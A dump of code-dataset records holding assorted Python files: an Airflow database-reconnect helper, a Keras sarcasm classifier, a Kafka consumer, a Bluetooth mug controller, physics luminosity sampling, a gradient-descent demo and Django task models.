problem of\n # simultaneous client reconnects\n backoff += backoff * random.random()\n time.sleep(min(backoff, max_backoff_seconds))\n\n # run the same SELECT again - the connection will re-validate\n # itself and establish a new connection. The disconnect detection\n # here also causes the whole connection pool to be invalidated\n # so that all stale connections are discarded.\n continue\n else:\n log.error(\n \"Unknown database connection error. 
Not retrying: %s\",\n err)\n raise\n finally:\n # restore \"close with result\"\n connection.should_close_with_result = save_should_close_with_result\n\n\n @event.listens_for(engine, \"connect\")\n def connect(dbapi_connection, connection_record):\n connection_record.info['pid'] = os.getpid()\n\n\n @event.listens_for(engine, \"checkout\")\n def checkout(dbapi_connection, connection_record, connection_proxy):\n pid = os.getpid()\n if connection_record.info['pid'] != pid:\n connection_record.connection = connection_proxy.connection = None\n raise exc.DisconnectionError(\n \"Connection record belongs to pid {}, \"\n \"attempting to check out in pid {}\".format(connection_record.info['pid'], pid)\n )\n","sub_path":"airflow/utils/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588685759","text":"import json\nimport os\nimport wget\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 3\"\n\n# Load sarcasm dataset\ndata_dir = 'sarcasm'\nfilename = os.path.join(data_dir, 'sarcasm.json')\nif not os.path.exists(data_dir):\n # Download dataset\n os.mkdir(data_dir)\n url = 'https://storage.googleapis.com/laurencemoroney-blog.appspot.com/sarcasm.json'\n filename = wget.download(url, out=data_dir)\n\nwith open(filename, 'r') as f:\n datastore = json.load(f)\n\nvocab_size = 10000\nembedding_dim = 16\nmax_length = 100\ntrunc_type = 'post'\npadding_type = 'post'\noov_tok = \"\"\ntraining_size = 20000\n\nsentences = []\nlabels = []\n\nfor item in datastore:\n sentences.append(item['headline'])\n labels.append(item['is_sarcastic'])\n\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# Need this block to get it to work with TensorFlow 2.x\n\ntraining_padded = np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs,\n validation_data=(testing_padded, testing_labels), verbose=2)\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_' + string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_' + string])\n 
plt.show()\n\n\nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\ndef decode_sentence(text):\n    return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape)  # shape: (vocab_size, embedding_dim)\n\nsentence = [\"granny starting to fear spiders in the garden might be real\",\n            \"game of thrones season finale showing this sunday night\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))\n\n# End of file tag\nprint('eof')\n","sub_path":"_35_SarcasmClassifier.py","file_name":"_35_SarcasmClassifier.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61060928","text":"import os\r\nimport logging\r\nimport datetime\r\nimport time\r\nimport pymysql\r\nimport configparser\r\nfrom confluent_kafka import KafkaError,Consumer,KafkaException\r\nfrom bson import json_util, ObjectId\r\nfrom bson.json_util import dumps,loads,JSONOptions,DEFAULT_JSON_OPTIONS\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\"\"\" A class that pulls data from the KAFKA database\"\"\"\r\n\"\"\"Receives data from an unauthenticated host\"\"\"\r\nclass Fetch(object) :\r\n\t\"\"\"Override the class's initialization attributes\"\"\"\r\n\tdef __init__(self) :\r\n\t\tself.config = configparser.RawConfigParser()\r\n\t\tself.config.read('./config.cfg')\r\n\t\tif not os.path.exists('./Log'):\r\n\t\t\tos.makedirs('./Log')\r\n\t\tlogging.basicConfig(filename='./Log/'+datetime.datetime.today().strftime(\"%Y%m%d\")+'.log'\r\n\t\t\t, level=logging.INFO\r\n\t\t\t, format='%(asctime)s %(message)s'\r\n\t\t\t, datefmt='%Y/%m/%d %I:%M:%S %p')\r\n\t\t\r\n\t\t\"\"\"Create the client that connects to Kafka. Name group.id freely, but make sure nobody else is using the same id: an id can only pull the data once, and every pull fetches data from seven days ago up to now\"\"\"\r\n\t\ttry :\r\n\t\t\tSource_Kafka_Consumer = Consumer({\r\n\t\t\t\t\t'bootstrap.servers':'xx.xx.xx.xx:xx'\r\n\t\t\t\t\t,'group.id':'careyfetch'\r\n\t\t\t\t\t,'auto.offset.reset':'earliest'\r\n\t\t\t\t\t, 'session.timeout.ms': 6000\r\n\t\t\t\t\t})\r\n\t\t\tDEFAULT_JSON_OPTIONS.strict_uuid = True\r\n\t\t\tSource_Kafka_Consumer.subscribe(['xxx.xxx.xxx'])\t\t#specify which topic to pull data from\r\n\t\t\tself.consumer = Source_Kafka_Consumer\r\n\t\texcept Exception as inst:\r\n\t\t\tprint('kafka Connection Fail')\r\n\t\t\tprint(inst)\r\n\t\t\tlogging.error('kafka Connection Fail')\r\n\t\t\tlogging.error(inst)\r\n\t\r\n\t\"\"\"An example function that pulls data from Kafka\"\"\"\r\n\tdef fetch_xxxx(self):\r\n\t\ttry:\r\n\t\t\tonelist = []\r\n\t\t\tcount = 0\r\n\t\t\twhile True:\r\n\t\t\t\t\"\"\"Pull data using the configured Kafka client and its parameters\"\"\"\r\n\t\t\t\tmsg = self.consumer.poll(1)\r\n\t\t\t\tif msg is None:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif msg.error():\r\n\t\t\t\t\tprint('Consumer error: {}'.format(msg.error()))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\"\"\"Extract and store the data\"\"\"\r\n\t\t\t\tdata = json_util.loads(msg.value())\r\n\t\t\t\tonelist.append(data)\r\n\t\t\t\tcount = count + 1\r\n\t\t\t\tif count == 1000 :\r\n\t\t\t\t\tbreak\r\n\t\t\tself.consumer.close()\r\n\t\texcept Exception as inst:\r\n\t\t\t\tprint('kafka fetch meterbase Fail')\r\n\t\t\t\tprint(inst)\r\n\t\t\t\tlogging.error('kafka fetch meterbase Fail')\r\n\t\t\t\tlogging.error(inst)\r\n\t\treturn 
onelist\r\n","sub_path":"fetchkafka.py","file_name":"fetchkafka.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46799818","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Evaluator(object):\n\n def __init__(self, trainer, discount_factor):\n self._trainer = trainer\n self._discount_factor = discount_factor\n self.mc_loss = []\n self.td_loss = []\n\n def report(self, episode_values, predictions, td_loss):\n mc_loss = float(np.mean(np.abs(episode_values - predictions)))\n td_loss_mean = float(np.mean(td_loss))\n self.mc_loss.append(mc_loss)\n self.td_loss.append(td_loss_mean)\n logger.info(\"MC LOSS: {0:.3f} TD LOSS: {1:.3f}\".format(mc_loss, td_loss_mean))\n\n def get_recent_td_loss(self):\n begin = max(0, len(self.td_loss) - 100)\n return np.mean(np.array(self.td_loss[begin:]))\n\n def get_recent_mc_loss(self):\n begin = max(0, len(self.mc_loss) - 100)\n return np.mean(np.array(self.mc_loss[begin:]))\n","sub_path":"ml/rl/training/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356004436","text":"import asyncio\nfrom sys import platform\nimport logging\nfrom bleak import BleakClient, BleakScanner\n\nUUIDS = {\n \"target_temp\": \"fc540003-236c-4c94-8fa9-944a3e5353fa\",\n \"led_color\": \"fc540014-236c-4c94-8fa9-944a3e5353fa\",\n \"current_temp\": \"fc540002-236c-4c94-8fa9-944a3e5353fa\",\n \"current_bat\": \"fc540007-236c-4c94-8fa9-944a3e5353fa\",\n}\n\nlogging.basicConfig(format=\"%(asctime)s %(message)s \", level=logging.INFO)\n\n\nclass Mug:\n def __init__(self, unit: str, coffeeTemp=5500, teaTemp=5900):\n self.unit = unit\n self.coffeeTemp = coffeeTemp\n self.teaTemp = teaTemp\n self.keepConnectionAlive = True\n self.searchForDevice = True\n self.current_temp = None\n\n async def connectToMug(self):\n try:\n print(\"Searching..\", end=\"\")\n # self.connectionChanged.emit(False)\n # Search for the mug as long til we find it.\n while self.searchForDevice:\n print(\".\", end=\"\")\n scanner = BleakScanner()\n # scanner.register_detection_callback(detection_callback)\n await scanner.start()\n await asyncio.sleep(5.0)\n await scanner.stop()\n devices = await scanner.get_discovered_devices()\n for device in devices:\n if device.name == \"Ember Ceramic Mug\":\n # We found the ember mug!\n print(device.address)\n print(device.name)\n print(device.details)\n # try to connect to the mug\n async with BleakClient(device) as client:\n self.connectedClient = client\n self.isConnected = await client.is_connected()\n print(\"Connected: {0}\".format(self.isConnected))\n if platform != \"darwin\":\n # Avoid this on mac, since CoreBluetooth doesnt support pairing.\n y = await client.pair()\n print(\"Paired: {0}\".format(y))\n # Set connection parameters and use signal to send it to the UI.\n self.keepConnectionAlive = True\n # self.connectionChanged.emit(True)\n # await self.fetchLEDColor(self)\n # Auto update Temp and Battery\n # self.timer = QTimer()\n\n # Execute function every 3 seconds\n # TO-DO: Must decouple the calling of this function from the connection\n # while self.keepConnectionAlive:\n # We stay in here to keep the client alive\n # once keepConnectionAlive is set to false\n # the client will also disconnect automatically\n while self.keepConnectionAlive == True:\n await 
asyncio.sleep(1)\n # await asyncio.sleep(5)\n # print(\".\")\n # await asyncio.gather(\n # self.getCurrentBattery(),\n # self.getCurrentTemp(),\n # self.getTargetTemp(),\n # )\n # await asyncio.sleep(3)\n return\n except Exception as exc:\n # self.connectionChanged.emit(False)\n print(\"Error: {}\".format(exc))\n\n # # function to get the current temp from the async loop.\n # def fetchCurrentTemperature(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentTemp())\n\n # # function to get the current charge percentage from the async loop.\n # def fetchCurrentBattery(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentBattery())\n\n # Get the current temp\n async def getCurrentTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"current_temp\"]\n )\n CurrentDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n # Unit conversion\n if self.unit == \"F\":\n CurrentDegree = (CurrentDegree * 1.8) + 32\n CurrentDegree = round(CurrentDegree, 1)\n self.current_temp = CurrentDegree\n logging.info(\"Temp: %s\", self.current_temp)\n # await asyncio.sleep(3)\n # print(CurrentDegree)\n # Send UI Signal\n # self.getDegree.emit(float(CurrentDegree))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getCurrentBattery(self):\n if await self.connectedClient.is_connected():\n currentBat = await self.connectedClient.read_gatt_char(UUIDS[\"current_bat\"])\n logging.info(\"Battery: %s\", float(currentBat[0]))\n # await asyncio.sleep(3)\n # Send UI Signal\n # self.getBattery.emit(float(currentBat[0]))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getTargetTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"target_temp\"]\n )\n TargetDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n if self.unit == \"F\":\n TargetDegree = (TargetDegree * 1.8) + 32\n TargetDegree = round(TargetDegree, 1)\n logging.info(\"Temp: %s\", TargetDegree)\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def update_values(self):\n while True:\n try:\n await self.getCurrentBattery()\n await self.getCurrentTemp()\n await self.getTargetTemp()\n await asyncio.sleep(3)\n except:\n print(\"Not connected, trying again in 10 seconds\")\n await asyncio.sleep(10)\n\n async def setToTemp(self, temp: float):\n while True:\n try:\n print(\"Trying\")\n if await self.connectedClient.is_connected():\n if self.unit == \"F\":\n temp = (temp - 32) / 1.8\n print(temp)\n print(\"try setting the target temperature\")\n convert_temp = int(temp * 1000)\n print(convert_temp)\n newtarget = bytearray(convert_temp.to_bytes(2, \"little\"))\n await self.connectedClient.write_gatt_char(\n UUIDS[\"target_temp\"], newtarget, False\n )\n return\n # Send UI Signal\n # self.getDegree.emit(float(temp * 0.01))\n\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n except Exception as err:\n print(\"sleep\")\n print(err)\n await asyncio.sleep(5)\n","sub_path":"mug/mug.py","file_name":"mug.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"483883424","text":"\"\"\"\nAPP-Q2:\n\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\n 
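# --- Added sketch (not part of the original record): in the G(n, p) construction of
# make_er_graph below, each ordered pair (src, dest) with src != dest receives an
# edge with probability p, so the expected number of directed edges is n*(n-1)*p and
# the expected in-degree of every node is (n-1)*p. For the make_er_graph(1000, 0.05)
# call used in this script:
expected_edges = 1000 * 999 * 0.05      # 49950.0
expected_in_degree = 999 * 0.05         # 49.95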
\nimport graph_degree_dist as dist\n\ndef make_er_graph(num_nodes, prob):\n\ter_graph = dict()\n\tnodes = set([i for i in xrange(num_nodes)])\n\tfor src in xrange(num_nodes):\n\t\ter_graph[src] = []\n\t\tdest_candidates = set(nodes)\n\t\tdest_candidates.remove(src)\n\t\tfor dest in dest_candidates:\n\t\t\tif random.random() < prob:\n\t\t\t\ter_graph[src].append(dest)\n\treturn er_graph\n\ner_graph = make_er_graph(1000, 0.05)\nin_degree_dist = dist.in_degree_distribution(er_graph)\ndist.plot_dist(in_degree_dist, 'bo',\n\t'In-degree (log scale)',\n\t'Probability (log scale)',\n\t'In-degree distribution of ER directed graph')","sub_path":"week1/app/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465312776","text":"\"\"\"\nproblem_010\n\nWrite the combination formula as a function.\n\nYou may use a factorial function.\n\"\"\"\n\ndef my_combination(a,b):\n    \n    if a < b:\n        return False\n    \n    a_b = a - b\n\n    # C(n, 0) = C(n, n) = 1; also avoids dividing by zero below\n    if b == 0 or a_b == 0:\n        return 1\n    \n    for a_i in range(1, a):\n        a *= a_i\n    for b_i in range(1, b):\n        b *= b_i\n    for ab_i in range(1, a_b):\n        a_b *= ab_i\n\n    return int(a / (a_b * b))\n\nprint(my_combination(5,3))","sub_path":"algorithm/stud_group/problem_010.py","file_name":"problem_010.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"105209892","text":"import sys\nfrom collections import defaultdict\nfrom ROOT import TGraph, TVectorF, TCanvas, TH1F, kRed\nfrom JMTucker.Tools.ROOTTools import *\nfrom itertools import izip\nimport random\nfrom FWCore.PythonUtilities import LumiList\n\nheader = ['Run:Fill', 'LS', 'UTCTime', 'Beam Status', 'E(GeV)', 'Del(/nb)', 'Rec(/nb)', 'avgPU']\nps = plot_saver('plots_lumibyls_V3', size=(600,600))\n\ninfo = ()\n\ni = 0\n\nthis_fill = 0\nthis_run = 0\nthis_fill_rec = []\nthis_fill_apu = []\nthis_run_pos = []\n\nlumis = []\npileups = []\ntimes = []\nfill = 0\n\nsum_luminosity = 0\nsum_luminosity2 = 0\nmax_ls = 167.147\nrandom.seed()\n\nlluminosity = []\nlpileup = []\nllumisec = []\nlrun = []\n\n# All\nh_pileup = TH1F(\"h_pileup\",\"h_pileup\",100,0,50)\nh_w_pileup = TH1F(\"h_w_pileup\",\"h_w_pileup\",100,0,50)\nh_w_pileup.Sumw2()\n\nh_luminosity = TH1F(\"h_luminosity\",\"h_luminosity\",200,0,170)\nh_w_luminosity = TH1F(\"h_w_luminosity\",\"h_w_luminosity\",200,0,170)\nh_w_luminosity.Sumw2()\n\n# Random Pick\nh_pileup_picked = TH1F(\"h_pileup_picked\",\"h_pileup_picked\",100,0,50)\nh_w_pileup_picked = TH1F(\"h_w_pileup_picked\",\"h_w_pileup_picked\",100,0,50)\nh_w_pileup_picked.Sumw2()\n\n# Shaped distribution\nh_shaped_pileup = TH1F(\"h_shaped_pileup\",\"h_shaped_pileup\",100,0,50)\nh_w_shaped_pileup = TH1F(\"h_w_shaped_pileup\",\"h_w_shaped_pileup\",100,0,50)\nh_w_shaped_pileup.Sumw2()\n\nh_shaped_luminosity = TH1F(\"h_shaped_luminosity\",\"h_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity = TH1F(\"h_w_shaped_luminosity\",\"h_w_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity.Sumw2()\n\nfor line in open(sys.argv[1]):\n    line = line.split('|')\n    #print len(line), line\n    if len(line) != 10:\n        continue\n    line = [x.strip() for x in line if x.strip()]\n\n    run_fill, ls, time, status, energy, delivered, recorded, avgpu = line\n    \n    if fill != \"Fill\":\n        fill_m1 = int(fill)\n    \n    try:\n        run, fill = run_fill.split(':')\n        run = int(run)\n        fill = int(fill)\n        ls = int(ls.split(':')[0])\n        recorded = float(recorded)\n        avgpu = float(avgpu)\n    except ValueError:\n        assert line == header\n        continue\n    \n    #print 
'%i,%i,%i,%s,%g,%g' % (i,fill,run,time,recorded,avgpu)\n\n #print \"lumi=\",ls,\" pileup=\",avgpu\n \n assert fill >= this_fill\n assert run >= this_run\n\n# if avgpu < 4:\n # print \"Fill with small pileup=\",fill\n # print \"Run with small pileup=\",run\n\n lluminosity.append(recorded)\n lpileup.append(avgpu)\n llumisec.append(ls)\n lrun.append(run)\n \n if fill_m1 != fill:\n i = 0\n Luminosity = TVectorF(221878)\n Pileup = TVectorF(221878)\n Time = TVectorF(221878)\n lumis.append(Luminosity)\n pileups.append(Pileup)\n times.append(Time)\n\n #print i,fill_m1,fill\n \n Luminosity[i] = recorded\n Pileup[i] = avgpu\n zeit = time.split(\" \")[1] # FIX TIME\n Zeit = int(int(zeit.split(\":\")[0])*3600+int(zeit.split(\":\")[1])*60+int(zeit.split(\":\")[2]))\n Time[i] = Zeit\n i += 1\n\nfor rec,pu in izip(lluminosity,lpileup):\n h_pileup.Fill(pu)\n h_luminosity.Fill(rec)\n h_w_pileup.Fill(pu,rec)\n\nlumi_list = LumiList.LumiList('Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt')\nreduced_lumi_list = LumiList.LumiList()\n\nwhile sum_luminosity2 < 1000000.:\n x = random.randint(0,221878)\n sum_luminosity2 += lluminosity[x]\n h_pileup_picked.Fill(lpileup[x])\n h_w_pileup_picked.Fill(lpileup[x],lluminosity[x])\n if lumi_list.contains(lrun[x],llumisec[x]):\n reduced_lumi_list = reduced_lumi_list + LumiList.LumiList('',[[lrun[x],llumisec[x]]])\n\nreduced_lumi_list.writeJSON('picked_data_JSON.txt')\n \n \nh_pileup.DrawNormalized()\nh_pileup_picked.SetLineColor(kRed)\nh_pileup_picked.DrawNormalized()\nh_pileup.DrawNormalized(\"same\")\nps.save(\"h_pileup_norm\")\n\nh_w_pileup_picked.SetLineColor(kRed)\nh_w_pileup_picked.DrawNormalized()\nh_w_pileup.DrawNormalized(\"same\")\nps.save(\"h_w_pileup_norm\")\n\n \n#count=0\n#print \"How many fills? \",len(lumis),len(pileups),len(times)\n#for i,j,k in izip(lumis,pileups,times):\n# h1=TGraph(k,i)\n# h1.Draw(\"AP\")\n# ps.save(\"Lumi\"+str(count))\n# h2=TGraph(k,j)\n# h2.Draw(\"AP\")\n# ps.save(\"Pileup\"+str(count))\n# count +=1\n\n","sub_path":"MFVNeutralino/test/lumibyls.py","file_name":"lumibyls.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149523948","text":"# Behnam Asadi \n# http://ros-developer.com\n# To see the function that we are working on visit:\n# http://ros-developer.com/2017/05/07/gradient-descent-method-for-finding-the-minimum/\n# or simply put the following latex code in a latex doc:\n# $$ z= -( 4 \\times e^{- ( (x-4)^2 +(y-4)^2 ) }+ 2 \\times e^{- ( (x-2)^2 +(y-2)^2 ) } )$$\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n\ndef objective_function(x,y):\n z=-( 4*np.exp(-(x-4)**2 - (y-4)**2)+2*np.exp(-(x-2)**2 - (y-2)**2) )\n return z\n\n\ndef f_prim(x,y):\n f_x=-( (-2)*(x-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(x-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n f_y=-( (-2)*(y-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(y-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n return [f_x,f_y]\n\n \nx = np.linspace(-2,10,200)\ny = np.linspace(-2,10,200)\n\nX, Y = np.meshgrid(x,y)\n\nZ=objective_function(X,Y)\n\n\n#Make a 3D plot\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(X, Y, Z,linewidth=0,cmap='coolwarm')\n\nax.set_xlabel('X axis')\nax.set_ylabel('Y axis')\nax.set_zlabel('Z axis')\n\n\nX_old=-2\nY_old=0\n\n\n# The starts point for the algorithm:\nX_new=4\nY_new=2.2\n\n# step size\nepsilon=0.1\n\n# stop criteria\nprecision = 
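The random-pick loop above accumulates uniformly sampled lumisections until a target recorded luminosity is reached. Note that random.randint(0, 221878) is inclusive on both ends, so if the list holds exactly 221878 entries the index can run one past the last element. A self-contained distillation using randrange instead (names hypothetical):

import random

def pick_lumisections(recorded, pileup, target_lumi, seed=0):
    """Uniformly sample lumisection indices until the recorded sum hits the target."""
    rng = random.Random(seed)
    picked, total = [], 0.0
    while total < target_lumi:
        i = rng.randrange(len(recorded))         # never indexes past the end
        total += recorded[i]
        picked.append((pileup[i], recorded[i]))  # (avg pileup, luminosity weight)
    return picked, total

rec = [0.5, 1.2, 0.8, 2.0]
pu = [10.0, 22.0, 15.0, 30.0]
picked, total = pick_lumisections(rec, pu, target_lumi=5.0)
assert total >= 5.0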
0.00001\n\n\n\nx_path_to_max=[]\ny_path_to_max=[]\nz_path_to_max=[]\n\n\n\nwhile np.sqrt( (X_new-X_old)**2 + (Y_new-Y_old)**2 ) > precision:\n X_old=X_new\n Y_old=Y_new\n \n #[X_new,Y_new]=f_prim(X_new,Y_new)\n #print f_prim(X_new,Y_new)\n x_path_to_max.append(X_new )\n y_path_to_max.append(Y_new )\n z=objective_function(X_new,Y_new)\n z_path_to_max.append(z)\n \n ret_val=f_prim(X_old,Y_old)\n X_new=X_old-epsilon*ret_val[0]\n Y_new=Y_old-epsilon*ret_val[1]\n# print X_new\n# print Y_new\n \n \n\nline1=plt.plot(x_path_to_max,y_path_to_max,z_path_to_max)\nplt.setp(line1,color='g',linewidth=0.5)\n\n\n#print X_new\n#print Y_new\nplt.show()\n\n\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw02/gradDescent/grad_desc9.py","file_name":"grad_desc9.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240655038","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.utils.http import urlquote\nfrom django.utils.timesince import timesince, timeuntil\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import Slugged, base_concrete_model, DateStamp\n\nfrom projects.models import Project\nimport reversion\n\ndef get_sentinel_category():\n return TaskCategory.objects.get_or_create(title='Deleted')[0]\n\nclass Task(Slugged):\n project = models.ForeignKey(Project)\n category = models.ForeignKey('TaskCategory', blank=True, null=True,\n on_delete=models.SET(get_sentinel_category))\n projected_completion_date = models.DateField(_(\"Projected Completion Date\"),\n blank=True, null=True)\n completion_date = models.DateField(_(\"Actual Completion Date\"),\n blank=True, null=True)\n description = models.TextField(blank=True)\n expense = models.IntegerField(blank=True)\n price = models.IntegerField(blank=True, verbose_name=_('Markup'))\n\n class Meta:\n order_with_respect_to = 'project'\n\n def save(self, *args, **kwargs):\n if not self.category:\n self.category = get_sentinel_category()\n super(Task, self).save(*args, **kwargs)\n\n\n def get_absolute_url(self):\n return reverse('tasks:task-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('tasks:task-update', kwargs={'pk': self.pk})\n\n def due_date_until(self):\n if self.projected_completion_date:\n return timeuntil(self.projected_completion_date)\n\n def due_date_since(self):\n if self.projected_completion_date:\n return timesince(self.projected_completion_date)\n\n def get_status(self):\n if self.project.start_time:\n if self.completion_date:\n result = 2\n else:\n result = 1\n else:\n result = 0\n return result\n\n def get_project_category_totals(self):\n result_dict = {}\n all_categories = TaskCategory.objects.all()\n all_tasks = Task.objects.filter(project=self.project)\n all_categories = all_categories.order_by('order')\n for cat in all_categories:\n cat_tasks = all_tasks.filter(category=cat)\n if cat_tasks:\n cat_exp_total = sum(cat_tasks.values_list('expense', flat=True))\n cat_price_total = sum(cat_tasks.values_list('price', flat=True))\n result_dict[cat.slug] = {\n 'id': cat.id,\n 'title': cat.title,\n 'expense': cat_exp_total,\n 'price': cat_price_total,\n 'total': sum([cat_exp_total, cat_price_total]),\n 'tasks': cat_tasks\n }\n return result_dict\n\n due_date_since.short_description = _(\"Late by\")\n due_date_until.short_description = _(\"Due in\")\nreversion.register(Task)\n\n\nclass TaskCategory(Slugged):\n parent = 
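A quick way to validate the hand-derived gradient in grad_desc9.py above is a central finite-difference check; local copies of the objective and its gradient are included so the snippet runs on its own:

import numpy as np

def objective(x, y):
    return -(4 * np.exp(-(x - 4) ** 2 - (y - 4) ** 2)
             + 2 * np.exp(-(x - 2) ** 2 - (y - 2) ** 2))

def grad(x, y):
    gx = -((-2) * (x - 4) * 4 * np.exp(-(x - 4) ** 2 - (y - 4) ** 2)
           + (-2) * (x - 2) * 2 * np.exp(-(x - 2) ** 2 - (y - 2) ** 2))
    gy = -((-2) * (y - 4) * 4 * np.exp(-(x - 4) ** 2 - (y - 4) ** 2)
           + (-2) * (y - 2) * 2 * np.exp(-(x - 2) ** 2 - (y - 2) ** 2))
    return np.array([gx, gy])

def numeric_grad(f, x, y, h=1e-6):
    # Central differences: O(h^2) truncation error.
    return np.array([(f(x + h, y) - f(x - h, y)) / (2 * h),
                     (f(x, y + h) - f(x, y - h)) / (2 * h)])

x0, y0 = 3.0, 2.5
assert np.allclose(grad(x0, y0), numeric_grad(objective, x0, y0), atol=1e-5)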
models.ForeignKey(\"TaskCategory\", blank=True, null=True,\n related_name=\"children\", on_delete=models.SET_NULL)\n ascendants = models.CharField(editable=False, max_length=100, null=True)\n order = models.IntegerField(blank=True, null=True)\n description = models.TextField(blank=True)\n\n class Meta:\n ordering = ('_order', 'order', 'ascendants')\n order_with_respect_to = 'parent'\n\n def save(self, *args, **kwargs):\n\n if self.parent is None:\n self._order = self.order\n\n if self.ascendants:\n if not self.id in [int(ascendant) for ascendant in self.ascendants.split(',')[:-1]]:\n if self.update_descendants():\n super(TaskCategory, self).save(*args, **kwargs)\n else:\n #print 'error: self id in ascendants'\n pass\n else:\n super(TaskCategory, self).save(*args, **kwargs)\n self.update_descendants()\n\n def update_descendants(self):\n current_ascendants = self.ascendants\n #print 'current: ' + str(current_ascendants)\n\n ascendants = [str(self.id)]\n parent = self.parent\n while parent is not None and parent is not self:\n ascendants.insert(0, str(parent.id))\n if parent.parent:\n parent = parent.parent\n else:\n #the while condition will set parent to None and we cant validate it so we end the loop before this\n #while the parent is not None\n break\n if parent == self:\n break\n\n if parent != self or parent is None:\n #print 'parent safe'\n ascendants = \",\".join(ascendants)\n self.ascendants = ascendants\n\n if ascendants != current_ascendants or ascendants is None:\n super(TaskCategory, self).save(update_fields=['ascendants'])\n #print 'new : ' + str(self.ascendants)\n\n children = self.children.all()\n if children:\n for child in children:\n child.update_descendants()\n return True\n else:\n return False\n\n\n def get_update_url(self):\n return reverse('tasks:task-category-update', kwargs={'pk': self.pk})\n\n def get_project_category_price(self, project):\n total = 